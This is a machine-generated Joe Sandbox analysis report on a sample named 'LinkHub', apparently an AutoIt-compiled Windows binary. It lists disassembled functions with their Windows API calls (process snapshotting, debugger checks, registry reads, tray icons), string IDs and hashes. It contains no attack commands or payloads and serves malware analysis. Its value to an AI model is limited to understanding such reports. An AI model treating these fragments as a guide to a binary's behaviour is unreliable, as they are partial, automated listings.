                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                        • String ID:
                                                                                        • API String ID: 3368777196-0
                                                                                        • Opcode ID: 76384a3a02d0506191d32e220fb018f2e92f5da51da2ca0aebe767bd799c33d3
                                                                                        • Instruction ID: 8faa7f25d1b67d7d7a75c802babd19180ccc722abf3f403f6b98f78f9eb7215b
                                                                                        • Opcode Fuzzy Hash: 76384a3a02d0506191d32e220fb018f2e92f5da51da2ca0aebe767bd799c33d3
                                                                                        • Instruction Fuzzy Hash: D4414C71910215EBDF049F94EC85AAA77B8FF44310B1480A5ED089A296D770DE71DBA4
                                                                                        Function 002061A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00245287
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00206299
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                        • String ID: Line %d: $AutoIt -
                                                                                        • API String ID: 2289894680-4094128768
                                                                                        • Opcode ID: 9000cf015ebfdfeea0b6b7036f72e82d70eb555557cbd821a81cb09538d8ec4b
                                                                                        • Instruction ID: c0cc8652257d82300165765e2222386ad167f7ccd93c5e08f0ff91b66550eb37
                                                                                        • Opcode Fuzzy Hash: 9000cf015ebfdfeea0b6b7036f72e82d70eb555557cbd821a81cb09538d8ec4b
                                                                                        • Instruction Fuzzy Hash: 9E41B271428311ABC721EB60EC49ADF77ACAF54310F00461EF895921D2EB709A79CB92
                                                                                        Function 00238A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1435 238a2e-238a42 call 235737 1438 238a44-238a46 1435->1438 1439 238a48-238a50 1435->1439 1440 238a96-238ab6 call 2356a6 1438->1440 1441 238a52-238a59 1439->1441 1442 238a5b-238a5e 1439->1442 1452 238ac4 1440->1452 1453 238ab8-238ac2 call 22f613 1440->1453 1441->1442 1444 238a66-238a7a call 235737 * 2 1441->1444 1445 238a60-238a64 1442->1445 1446 238a7c-238a8c call 235737 CloseHandle 1442->1446 1444->1438 1444->1446 1445->1444 1445->1446 1446->1438 1455 238a8e-238a94 GetLastError 1446->1455 1457 238ac6-238ac9 1452->1457 1453->1457 1455->1440
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,OV$,0023894C,?,002C9CE8,0000000C,002389AB,?,OV$,?,0024564F), ref: 00238A84
                                                                                        • GetLastError.KERNEL32 ref: 00238A8E
                                                                                        • __dosmaperr.LIBCMT ref: 00238AB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                        • String ID: OV$
                                                                                        • API String ID: 2583163307-1415908844
                                                                                        • Opcode ID: b4cdf2edbd2fe12e704ca38c75f199ee2ff4d4df7514b2eb1143dd19da481f5d
                                                                                        • Instruction ID: 86cd7d95cfa0672aa1931293a1b24c4ce1f56ce5da0281099bf2fca354eaef0e
                                                                                        • Opcode Fuzzy Hash: b4cdf2edbd2fe12e704ca38c75f199ee2ff4d4df7514b2eb1143dd19da481f5d
                                                                                        • Instruction Fuzzy Hash: 97012B72A353706AC6246774BC4A77E67594B81734F29015BF9188F2D2DF70CDA04D90
                                                                                        Function 002058CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 002058EF
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 00205910
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 00205932
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 4d55f1fd6bcf3f4ab4d0689593144f0c89d0e9ddc9c2f13f077fd103c90f3064
                                                                                        • Instruction ID: 954184beb961c82f8897b305228781d9323fca1511e76670a29556b99fe79132
                                                                                        • Opcode Fuzzy Hash: 4d55f1fd6bcf3f4ab4d0689593144f0c89d0e9ddc9c2f13f077fd103c90f3064
                                                                                        • Instruction Fuzzy Hash: F7115A75520628FFDB218F64DC84EAF77B8EF00760B104419E801E7250E2319E51ABA0
                                                                                        Function 00212B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 00213006
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: CALL$bn&
                                                                                        • API String ID: 1385522511-2292580102
                                                                                        • Opcode ID: e933af1e188e2058329bc13b03cfe1578e2722c7eec9f3eb551ed6d3577e8209
                                                                                        • Instruction ID: 4fbe393a38d5c3f7f12b7c65b09b0efb77d16d86190df31c6a278ad6d4b7019e
                                                                                        • Opcode Fuzzy Hash: e933af1e188e2058329bc13b03cfe1578e2722c7eec9f3eb551ed6d3577e8209
                                                                                        • Instruction Fuzzy Hash: 7D229E70628202DFC714CF14D484A6ABBF1BFA8314F14495DF8998B391D771E9A5CF92
                                                                                        Function 00203A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0024413B
                                                                                          • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
                                                                                          • Part of subcall function 00203A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00203A76
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                        • String ID: X$`u,
                                                                                        • API String ID: 779396738-3377881358
                                                                                        • Opcode ID: 7d62220be5a236013faf6ff0548070c48cfef433a9762c28fcafaabf3ab4a55b
                                                                                        • Instruction ID: e9fc3a2b2d7973cc7bb2345a19afa98e32af8453bb120c866a23e222f8af00c9
                                                                                        • Opcode Fuzzy Hash: 7d62220be5a236013faf6ff0548070c48cfef433a9762c28fcafaabf3ab4a55b
                                                                                        • Instruction Fuzzy Hash: EB21C371A202589BCB15DF94D809BEE7BFCAF48300F00805AE444B7282DBF49A998F61
                                                                                        Function 0022014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002209D8
                                                                                          • Part of subcall function 00223614: RaiseException.KERNEL32(?,?,?,002209FA,74DE2E40,?,?,?,?,?,?,?,002209FA,?,002C9758), ref: 00223674
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002209F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                        • String ID: Unknown exception
                                                                                        • API String ID: 3476068407-410509341
                                                                                        • Opcode ID: c6a3cdd689d055cb32a836fa41662602964233d940c1cd114cf026d059b89d77
                                                                                        • Instruction ID: 435e026e86d3f819397f283697d9c370b45ea70599b4b7ad1b025dc6de3e2a7f
                                                                                        • Opcode Fuzzy Hash: c6a3cdd689d055cb32a836fa41662602964233d940c1cd114cf026d059b89d77
                                                                                        • Instruction Fuzzy Hash: 8FF0C83493022DB78B00BEE4FC86EAE776C5E01750B504164B919965E3FB70E6B9C9D0
                                                                                        Function 002889B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00288D52
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00288D59
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00288F3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 146820519-0
                                                                                        • Opcode ID: 3abb4dbb44e7637bca8e0e87f053abaee60b75e6392dfb318ca6b3f47188ea4c
                                                                                        • Instruction ID: 117ff6402a328e2d77e33164345d2d1b5fc3dae76608d680ea931693d0463f6b
                                                                                        • Opcode Fuzzy Hash: 3abb4dbb44e7637bca8e0e87f053abaee60b75e6392dfb318ca6b3f47188ea4c
                                                                                        • Instruction Fuzzy Hash: 87128975A193019FC724DF28C484B2ABBE5BF88314F44895DF8898B292CB71E955CF92
                                                                                        Function 00289AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_strcat
                                                                                        • String ID:
                                                                                        • API String ID: 306214811-0
                                                                                        • Opcode ID: 11a635cf94adef85e5615e094106b7d6754ad2f87653cec9a6f55e1e858e9e9b
                                                                                        • Instruction ID: bb5d28b2d557bc5984b5a4c5bd1cc5769b92ed45dea38dbe8828b50071105659
                                                                                        • Opcode Fuzzy Hash: 11a635cf94adef85e5615e094106b7d6754ad2f87653cec9a6f55e1e858e9e9b
                                                                                        • Instruction Fuzzy Hash: 01A18F34610605EFCB18EF58D5C1979B7A5FF49314B24846EE80A8F692DB32EDA1CF80
                                                                                        Function 0023970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002397BA,FF8BC369,00000000,00000002,00000000), ref: 00239744
                                                                                        • GetLastError.KERNEL32(?,002397BA,FF8BC369,00000000,00000002,00000000,?,00235ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00226F41), ref: 0023974E
                                                                                        • __dosmaperr.LIBCMT ref: 00239755
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                        • String ID:
                                                                                        • API String ID: 2336955059-0
                                                                                        • Opcode ID: fba8ef6d71361390d5dae29ed3c510894c076b553dec808e9de2aa62e384e334
                                                                                        • Instruction ID: f9c76c12e2f5fccf4ea60757fed9efea7ca7d02441fde042a30766dc8d126d12
                                                                                        • Opcode Fuzzy Hash: fba8ef6d71361390d5dae29ed3c510894c076b553dec808e9de2aa62e384e334
                                                                                        • Instruction Fuzzy Hash: A0012D73630115BBCB159F99EC4586EB729DB86330F240255F815871D0E6B0DD619BD0
                                                                                        Function 00270D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D2E
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D36
                                                                                        • DuplicateHandle.KERNELBASE(00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 1294930198-0
                                                                                        • Opcode ID: f3e8250316e5da29a57bd3af07bdb3d0eab6c929ae9c8610f3e4e3f627f2c1c3
                                                                                        • Instruction ID: 81ca812384a9da1f8a25559d716d6d3004d92130d85cad4aaac4dd20ffd8b870
                                                                                        • Opcode Fuzzy Hash: f3e8250316e5da29a57bd3af07bdb3d0eab6c929ae9c8610f3e4e3f627f2c1c3
                                                                                        • Instruction Fuzzy Hash: 2BD0177B150306BBC7121BE5FC4DF3B7B6CDB86B62F10805AF60D86150DAB09410AA25
                                                                                        Function 0021FFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE ref: 0022007D
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0022008F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3280610774-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 90c245dbd0e78cd47fc8be7b7997d3f77ed68a33ba618e30effe75be727ae3c4
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 8031D770A10116EFE718CF98E4C0A69F7A5FF59300B6486A5E409CB252D772EEE1CBC0
                                                                                        Function 0020396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203A3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_
                                                                                        • String ID:
                                                                                        • API String ID: 1144537725-0
                                                                                        • Opcode ID: c349a7590c6f5114ef696252aacbaa83d98f8b18f42dbc27de5f92385aabe7fd
                                                                                        • Instruction ID: a5cc82baaa92d002891b2bed5693af3a59903e21c5c12ece9eda9bb624028af1
                                                                                        • Opcode Fuzzy Hash: c349a7590c6f5114ef696252aacbaa83d98f8b18f42dbc27de5f92385aabe7fd
                                                                                        • Instruction Fuzzy Hash: 0331A570615701DFD360DF24E888797BBE8FB59318F00092EE5D987281E7B5A958CF52
                                                                                        Function 00234EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00234F04
                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00234F16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID:
                                                                                        • API String ID: 3000768030-0
                                                                                        • Opcode ID: a42b96b9203d4b0a5386b0b0606f64bcbadf8173847dc8f92c34541025ff82fd
                                                                                        • Instruction ID: 1b8ee894218872d67a9a8ea372366d99ce80e42004346f3463eb969c6cd551c0
                                                                                        • Opcode Fuzzy Hash: a42b96b9203d4b0a5386b0b0606f64bcbadf8173847dc8f92c34541025ff82fd
                                                                                        • Instruction Fuzzy Hash: 5F11B7B15387424BC730AE3DAC886227A94A796334F3C079AD5B6C79F1C774FCA19640
                                                                                        Function 00270AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00243A00,00000000), ref: 00270AEC
                                                                                        • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00270B0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                        • String ID:
                                                                                        • API String ID: 4104817828-0
                                                                                        • Opcode ID: 866e6ae5aec25aaaa81889c0dc3417b5971bd0419d1aa70718097f2651271af4
                                                                                        • Instruction ID: 4998a0ec648baae043b56394bd98f7752390192fb9de374b0069ae162f40b85c
                                                                                        • Opcode Fuzzy Hash: 866e6ae5aec25aaaa81889c0dc3417b5971bd0419d1aa70718097f2651271af4
                                                                                        • Instruction Fuzzy Hash: 45F017B15007059BC3209F56D9488A7FBECFF94720B40891FE48687A20C7B4B445CF91
                                                                                        Function 0020331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 0020333D
                                                                                          • Part of subcall function 002032E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002032FB
                                                                                          • Part of subcall function 002032E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00203312
                                                                                          • Part of subcall function 0020338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00203368,?), ref: 002033BB
                                                                                          • Part of subcall function 0020338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00203368,?), ref: 002033CE
                                                                                          • Part of subcall function 0020338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,002D2418,002D2400,?,?,?,?,?,?,00203368,?), ref: 0020343A
                                                                                          • Part of subcall function 0020338B: SetCurrentDirectoryW.KERNEL32(?,00000001,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002034BB
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00203377
